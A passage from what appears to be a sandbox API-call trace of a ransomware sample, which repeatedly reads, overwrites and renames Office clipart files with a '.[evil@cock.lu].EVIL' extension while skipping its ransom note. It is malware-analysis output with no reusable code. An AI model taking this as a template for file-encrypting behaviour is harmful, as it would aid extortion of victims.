_File=0x7ffc020ee2a0) returned 51 [0167.544] __uncaught_exception () returned 0x84b1160800 [0167.544] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0167.545] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02829J.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02829j.jpg"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02829J.JPG.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02829j.jpg.[evil@cock.lu].evil")) returned 1 [0167.546] ??_V@YAXPEAX@Z () returned 0x1 [0167.549] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02829J.JPG", dwFileAttributes=0x200) returned 0 [0167.550] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0167.550] wcsstr (_Str="PH02845G.GIF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0167.550] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02845G.GIF") returned 69 [0167.550] wcscmp (_String1="PH02845G.GIF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0167.550] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="PH02845G.GIF") returned 0x0 [0167.550] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02845G.GIF") returned 0x45 [0167.550] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02845G.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02845g.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0167.552] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e28040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x30f2, lpOverlapped=0x0) returned 1 [0167.554] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0167.555] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0167.555] _errno () returned 0x84b1160840 [0167.555] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0167.555] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e28040*, nNumberOfBytesToWrite=0x3100, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x3100, lpOverlapped=0x0) returned 1 [0167.555] CloseHandle (hObject=0x1a8) returned 1 [0167.555] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02845G.GIF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0167.555] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0167.555] __uncaught_exception () returned 0x84b1160800 [0167.555] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0167.555] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02845G.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02845g.gif"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02845G.GIF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02845g.gif.[evil@cock.lu].evil")) returned 1 [0167.557] ??_V@YAXPEAX@Z () returned 0x1 [0167.559] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02845G.GIF", dwFileAttributes=0x200) returned 0 [0167.559] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0167.559] wcsstr (_Str="PH02897J.JPG", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0167.559] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02897J.JPG") returned 69 [0167.560] wcscmp (_String1="PH02897J.JPG", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0167.560] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="PH02897J.JPG") returned 0x0 [0167.560] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02897J.JPG") returned 0x45 [0167.560] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02897J.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02897j.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0167.562] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b303f040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x3c45, lpOverlapped=0x0) returned 1 [0167.564] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0167.564] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0167.564] _errno () returned 0x84b1160840 [0167.564] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0167.564] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b303f040*, nNumberOfBytesToWrite=0x3c60, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x3c60, lpOverlapped=0x0) returned 1 [0167.564] CloseHandle (hObject=0x1a8) returned 1 [0167.565] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02897J.JPG", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0167.565] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0167.565] __uncaught_exception () returned 0x84b1160800 [0167.565] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0167.565] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02897J.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02897j.jpg"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02897J.JPG.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02897j.jpg.[evil@cock.lu].evil")) returned 1 [0167.566] ??_V@YAXPEAX@Z () returned 0x1 [0167.569] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02897J.JPG", dwFileAttributes=0x200) returned 0 [0167.569] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0167.569] wcsstr (_Str="PH03011U.BMP", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0167.569] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH03011U.BMP") returned 69 [0167.569] wcscmp (_String1="PH03011U.BMP", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0167.569] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="PH03011U.BMP") returned 0x0 [0167.569] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH03011U.BMP") returned 0x45 [0167.569] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH03011U.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph03011u.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0167.571] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e22040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x3c76, lpOverlapped=0x0) returned 1 [0167.573] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0167.573] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0167.573] _errno () returned 0x84b1160840 [0167.573] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0167.573] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e22040*, nNumberOfBytesToWrite=0x3c80, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x3c80, lpOverlapped=0x0) returned 1 [0167.573] CloseHandle (hObject=0x1a8) returned 1 [0167.574] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH03011U.BMP", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0167.574] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0167.574] __uncaught_exception () returned 0x84b1160800 [0167.574] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0167.574] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH03011U.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph03011u.bmp"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH03011U.BMP.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph03011u.bmp.[evil@cock.lu].evil")) returned 1 [0167.575] ??_V@YAXPEAX@Z () returned 0x1 [0167.578] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH03011U.BMP", dwFileAttributes=0x200) returned 0 [0167.578] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0167.578] wcsstr (_Str="PH03012U.BMP", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0167.578] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH03012U.BMP") returned 69 [0167.578] wcscmp (_String1="PH03012U.BMP", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0167.578] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="PH03012U.BMP") returned 0x0 [0167.578] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH03012U.BMP") returned 0x45 [0167.578] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH03012U.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph03012u.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0167.580] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1016, lpOverlapped=0x0) returned 1 [0167.583] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0167.583] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0167.583] _errno () returned 0x84b1160840 [0167.583] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0167.583] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040*, nNumberOfBytesToWrite=0x1020, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1020, lpOverlapped=0x0) returned 1 [0167.583] CloseHandle (hObject=0x1a8) returned 1 [0167.583] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH03012U.BMP", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0167.583] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0167.584] __uncaught_exception () returned 0x84b1160800 [0167.584] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0167.584] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH03012U.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph03012u.bmp"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH03012U.BMP.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph03012u.bmp.[evil@cock.lu].evil")) returned 1 [0167.585] ??_V@YAXPEAX@Z () returned 0x1 [0167.587] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH03012U.BMP", dwFileAttributes=0x200) returned 0 [0167.587] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0167.587] wcsstr (_Str="PH03014_.GIF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0167.587] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH03014_.GIF") returned 69 [0167.587] wcscmp (_String1="PH03014_.GIF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0167.587] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="PH03014_.GIF") returned 0x0 [0167.587] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH03014_.GIF") returned 0x45 [0167.588] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH03014_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph03014_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0167.589] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b303f040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x49d2, lpOverlapped=0x0) returned 1 [0167.594] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0167.594] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0167.594] _errno () returned 0x84b1160840 [0167.594] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0167.594] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b303f040*, nNumberOfBytesToWrite=0x49e0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x49e0, lpOverlapped=0x0) returned 1 [0167.594] CloseHandle (hObject=0x1a8) returned 1 [0167.595] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH03014_.GIF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0167.595] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0167.595] __uncaught_exception () returned 0x84b1160800 [0167.595] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0167.595] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH03014_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph03014_.gif"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH03014_.GIF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph03014_.gif.[evil@cock.lu].evil")) returned 1 [0167.596] ??_V@YAXPEAX@Z () returned 0x1 [0167.600] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH03014_.GIF", dwFileAttributes=0x200) returned 0 [0167.600] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0167.600] wcsstr (_Str="PH03041I.JPG", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0167.600] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH03041I.JPG") returned 69 [0167.600] wcscmp (_String1="PH03041I.JPG", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0167.600] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="PH03041I.JPG") returned 0x0 [0167.600] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH03041I.JPG") returned 0x45 [0167.600] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH03041I.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph03041i.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0167.603] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e28040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x78af, lpOverlapped=0x0) returned 1 [0167.610] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0167.610] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0167.610] _errno () returned 0x84b1160840 [0167.610] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0167.610] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e28040*, nNumberOfBytesToWrite=0x78c0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x78c0, lpOverlapped=0x0) returned 1 [0167.610] CloseHandle (hObject=0x1a8) returned 1 [0167.610] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH03041I.JPG", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0167.611] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0167.611] __uncaught_exception () returned 0x84b1160800 [0167.611] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0167.611] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH03041I.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph03041i.jpg"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH03041I.JPG.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph03041i.jpg.[evil@cock.lu].evil")) returned 1 [0167.612] ??_V@YAXPEAX@Z () returned 0x1 [0167.615] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH03041I.JPG", dwFileAttributes=0x200) returned 0 [0167.615] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0167.615] wcsstr (_Str="PH03143I.JPG", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0167.615] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH03143I.JPG") returned 69 [0167.615] wcscmp (_String1="PH03143I.JPG", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0167.615] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="PH03143I.JPG") returned 0x0 [0167.615] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH03143I.JPG") returned 0x45 [0167.615] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH03143I.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph03143i.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0167.617] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b303f040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x7450, lpOverlapped=0x0) returned 1 [0167.623] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0167.623] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0167.623] _errno () returned 0x84b1160840 [0167.623] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0167.623] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b303f040*, nNumberOfBytesToWrite=0x7460, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x7460, lpOverlapped=0x0) returned 1 [0167.623] CloseHandle (hObject=0x1a8) returned 1 [0167.623] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH03143I.JPG", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0167.624] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0167.624] __uncaught_exception () returned 0x84b1160800 [0167.624] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0167.624] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH03143I.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph03143i.jpg"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH03143I.JPG.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph03143i.jpg.[evil@cock.lu].evil")) returned 1 [0167.625] ??_V@YAXPEAX@Z () returned 0x1 [0167.627] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH03143I.JPG", dwFileAttributes=0x200) returned 0 [0167.628] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0167.628] wcsstr (_Str="PH03205I.JPG", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0167.628] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH03205I.JPG") returned 69 [0167.628] wcscmp (_String1="PH03205I.JPG", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0167.628] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="PH03205I.JPG") returned 0x0 [0167.628] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH03205I.JPG") returned 0x45 [0167.628] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH03205I.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph03205i.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0167.630] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2d040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xa343, lpOverlapped=0x0) returned 1 [0167.636] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0167.636] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0167.636] _errno () returned 0x84b1160840 [0167.636] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0167.636] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2d040*, nNumberOfBytesToWrite=0xa360, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xa360, lpOverlapped=0x0) returned 1 [0167.636] CloseHandle (hObject=0x1a8) returned 1 [0167.637] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH03205I.JPG", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0167.637] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0167.637] __uncaught_exception () returned 0x84b1160800 [0167.637] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0167.637] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH03205I.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph03205i.jpg"), lpNewFileName="C:\\\\Program Files\\Microsoft 